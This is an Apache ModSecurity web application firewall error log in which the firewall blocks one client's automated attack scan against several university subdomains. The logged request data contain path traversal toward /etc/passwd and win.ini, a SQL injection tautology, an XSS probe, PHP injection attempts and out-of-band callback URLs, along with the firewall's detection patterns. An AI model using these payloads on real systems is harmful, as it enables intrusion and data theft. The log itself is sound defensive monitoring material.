[Tue Aug 29 11:42:48.421119 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdSZNoAAAAX"]
[Tue Aug 29 11:42:48.433594 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAd4ayYAAAAj"]
[Tue Aug 29 11:42:48.435238 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAdV7d4AAAAa"]
[Tue Aug 29 11:42:48.438145 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13SMCo-f0AAAdb7mMAAAAb"]
[Tue Aug 29 11:42:48.495381 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13SMCo-f0AAAdUc3AAAAAZ"]
[Tue Aug 29 11:42:48.511727 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26gtwsw8c7ps35w1.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAcvBnkAAAAJ"]
[Tue Aug 29 11:42:48.519126 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAd4aycAAAAj"]
[Tue Aug 29 11:42:48.524196 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:apiKey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:apiKey: -cjmnbitjmimt14dgn26gctzmtnu38f84r.oast.site/test/test/test?key1=val1&dummy="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13SMCo-f0AAAeDirAAAAAx"]
[Tue Aug 29 11:42:48.534420 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SMCo-f0AAAdUc3EAAAAZ"]
[Tue Aug 29 11:42:49.368172 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ScCo-f0AAAdUc3IAAAAZ"]
[Tue Aug 29 11:42:49.385897 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13ScCo-f0AAAeChYEAAAAw"]
[Tue Aug 29 11:42:49.400543 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opensis/ajax.php"] [unique_id "ZO13ScCo-f0AAAeZ54wAAAAN"]
[Tue Aug 29 11:42:50.369650 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAeZ540AAAAN"]
[Tue Aug 29 11:42:50.369715 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAdV7eEAAAAa"]
[Tue Aug 29 11:42:50.379299 2023] [:error] [pid 1918] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAd@4AgAAAAs"]
[Tue Aug 29 11:42:50.379614 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:modname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../ found within ARGS:modname: misc/../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO13SsCo-f0AAAeChYIAAAAw"]
[Tue Aug 29 11:42:50.393455 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAc92z4AAAAD"]
[Tue Aug 29 11:42:50.414448 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAeX1B0AAAAK"]
[Tue Aug 29 11:42:50.488757 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAeDirEAAAAx"]
[Tue Aug 29 11:42:51.360030 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAdxUSoAAAAC"]
[Tue Aug 29 11:42:51.361290 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAeDirIAAAAx"]
[Tue Aug 29 11:42:51.366712 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAQSW2wAAAA0"]
[Tue Aug 29 11:42:51.368279 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAdSZN8AAAAX"]
[Tue Aug 29 11:42:51.376638 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAdb7mcAAAAb"]
[Tue Aug 29 11:42:51.376922 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAdQ3iMAAAAV"]
[Tue Aug 29 11:42:51.379642 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAd-F0IAAAAt"]
[Tue Aug 29 11:42:51.384567 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAXNuXQAAAAg"]
[Tue Aug 29 11:42:51.385675 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAc920AAAAAD"]
[Tue Aug 29 11:42:51.398053 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/ajax.php"] [unique_id 